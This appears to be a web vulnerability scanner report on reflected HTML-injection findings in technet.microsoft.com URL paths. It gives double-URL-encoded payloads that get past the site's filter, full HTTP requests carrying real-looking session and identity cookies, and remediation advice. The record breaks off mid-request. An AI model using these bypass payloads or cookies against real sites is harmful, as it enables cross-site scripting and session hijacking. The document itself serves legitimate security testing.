<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarydd097"><a>cc6f454d985/bb742578" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f426%2522%253e%253ca%253e0091db8f5bb was submitted in the REST URL parameter 3. This input was echoed as 6f426"><a>0091db8f5bb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742578.aspx6f426%2522%253e%253ca%253e0091db8f5bb HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742578.aspx6f426"><a>0091db8f5bb" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74ced%2522%253e%253ca%253ef8c0a390206 was submitted in the REST URL parameter 1. This input was echoed as 74ced"><a>f8c0a390206 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us74ced%2522%253e%253ca%253ef8c0a390206/library/bb742583.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us74ced"><a>f8c0a390206/library/bb742583" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2951e%2522%253e%253ca%253ec2961b6e386 was submitted in the REST URL parameter 2. This input was echoed as 2951e"><a>c2961b6e386 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2951e%2522%253e%253ca%253ec2961b6e386/bb742583.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2951e"><a>c2961b6e386/bb742583" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18b6%2522%253e%253ca%253ec61ea599091 was submitted in the REST URL parameter 3. This input was echoed as a18b6"><a>c61ea599091 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742583.aspxa18b6%2522%253e%253ca%253ec61ea599091 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:59:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742583.aspxa18b6"><a>c61ea599091" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a623a%2522%253e%253ca%253ec95da8222ab was submitted in the REST URL parameter 1. This input was echoed as a623a"><a>c95da8222ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usa623a%2522%253e%253ca%253ec95da8222ab/library/default(loband).aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:58 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usa623a"><a>c95da8222ab/library/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa021%2522%253e%253ca%253e619786c76b7 was submitted in the REST URL parameter 2. This input was echoed as aa021"><a>619786c76b7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryaa021%2522%253e%253ca%253e619786c76b7/default(loband).aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 